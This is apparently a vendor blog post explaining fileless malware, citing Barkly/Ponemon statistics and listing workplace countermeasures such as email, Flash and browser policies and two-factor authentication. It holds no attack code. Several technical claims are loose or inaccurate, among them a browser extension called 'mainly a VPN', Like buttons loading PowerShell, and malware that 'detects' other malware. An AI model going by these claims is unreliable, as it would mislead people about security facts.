Fileless Malware: What It Stands For?
Fileless malware, or non-malware, is a zero-footprint attack that does not depend on any malicious software to spread and infect the user’s machine. It, instead, finds existing vulnerabilities in the machine and takes advantage of it. Fileless malware illustrates the need for organizations to shift from a traditional protect/prevent security model to advocate an detection, one that incorporates threat intelligence, threat hunting, and blue/red/purple teams. This threat is an example of trying to defend against the “unknown unknowns.”
Fileless malware resides in the RAM of your computer and uses various malicious tools to get into safe and trusted processes such as iexplore.exe or adobe.exe. This is done to execute the attack and spread over to many systems in a short span of time.
This type of malware works on its own, which makes it difficult for any antivirus to detect, prevent, and remove it. The only solution to such an attack is to reboot the system, as the RAM stores data if your computer is on. However, the hacker can still use scripts to restart the computer and run the malware. The hacker can direct the vulnerability to steal data from your hard disk or extend the attack to other locations by using your Internet connection.
Characteristics of Fileless Malware
- It has no identity and comes with zero footprint, which is why typical antivirus tools cannot detect it.
- It has no particular behavior or pattern and, thus, cannot be detected by heuristics scanners.
- It is also known as memory-based malware as it lives in the RAM.
- It may be paired with other malware.
- It uses legitimate processes to carry out the attack.
- It uses the approved applications that already exist on your computer.
Purpose of Using Fileless Techniques and How It Works
When a malware is injected in a computer by using any random file, the action can be controlled, blocked, or removed by an antivirus already existing on that machine. However, if the attacker uses fileless malware, which can spread on its own accord, infecting by means of native processes, then it remains inaccessible. This type of malware comes with no footprint and therefore, cannot be detected by the antivirus.
A survey was performed by Barkly in association with Ponemon Institute on fileless cyberattacks, which revealed surprising outcomes:
|The first half of 2018 has seen a 94% rise in fileless malware. |
|Fileless attacks are 10 times more successful than file-based attacks. |
|More than 50% of the surveyed organizations experienced at least one successful attack that compromised their data or IT infrastructure. |
|A massive 77% of the surveyed attacks used exploits or fileless techniques. |
The Scramble for a Solution
The success of fileless attacks has questioned the existing security norms of organizations, and many of them are looking for a replacement or supplementary security solutions beyond their traditional antivirus. The belief that the antivirus can detect almost all malware, including fileless malware, is now facing a challenge. As a result, a vast number of organizations are investing in new, preventive solutions.
“4 out of 5 organizations replaced or augmented their existing antivirus in 2017.” As reported by Barkly and Ponemon. 
Counter Measures to Combat Fileless Malware
Other measures that can be implemented to block fileless malware are as follows:
i) Practice email policies:
- Email links:
Luring someone to a malicious website through an email link is a common practice, and many get trapped, too. This way, the malware enters your Windows computer. Hence, caution employees against clicking email links. Draft and implement email policies with certain restrictions within the organization so that the entry of malware can be controlled.
- Email attachments:
Educate your employees about the treatment of email attachments, such as PDF or MS Office documents.
When an email message asks for macros to be turned on, then some employees tend to follow the instructions without a second thought. Spreading malware by turning on macros in Microsoft is a common practice. It is better that your employees do not get familiar working with macros, lest they might enable them in documents.
ii) Dealing with Flash:
Flash has become notorious for spreading malware through browsers. Most browsers have replaced Flash with HTML5 for video inclusion. Microsoft Edge will not accept Flash code, whereas other popular browsers such as Firefox and Chrome give you the option to block Flash, and the Internet Explorer will not load Flash if you have disabled ActiveX.
iii) Avoid using office Internet for personal purposes:
Make a policy of blocking the usage of official network for personal email or websites. Even though this sort of policy is unpopular, a separate Internet connection can be taken for personal use of employees during their break time. This way you can refrain from spreading the infection on the main network.
iv) Protect your browsers:
Make a policy asking employees to use only one browser so that you can install the corresponding browser protection application on each computer. Internet Explorer and Microsoft Edge can be protected by using Windows Defender Application Guard which is part of Office 365, and its script will defend against fileless malware attacks. Similarly, for Firefox or Chrome, install the Webscribe extension, which is mainly a VPN. The extension can also strip off social media Like buttons as they can be a potential vector to load PowerShell instructions.
v) Strengthen your identification
The existence of PowerShell is not the only reason for the fileless malware to spread, but it is also the weak user authentication on company networks and servers. A non-malware attack can spread quickly if installed on a system that is accessible throughout the network. Implementing two-factor authentication can be a preferred solution that prompts for a passkey and restricts emulation of the malware.
Fileless malware attacks have the potential to succeed 10 times more than file-based malware. It is so intuitively performed that it detects file-based malware and combines with it to make the attack more powerful and destructive. Discussions on the measures to be taken to prevent such attacks are now making their way into board meetings, as well. Organizations are looking to create a strategy that encompasses various security measures, such as antivirus, endpoint security, and employee training, to combat these threats.
The recent rise in cyberattacks is creating a lot of employment opportunities for enthusiastic professionals. Whether you belong to the IT sector or are looking to step into the cybersecurity industry, a certification can help you on your way. EC-Council offers a wide variety of cybersecurity certifications for various domains, such as ethical hacking, penetration testing, application security, and cyber forensic investigation. For more details, visit https://www.eccouncil.org/programs/.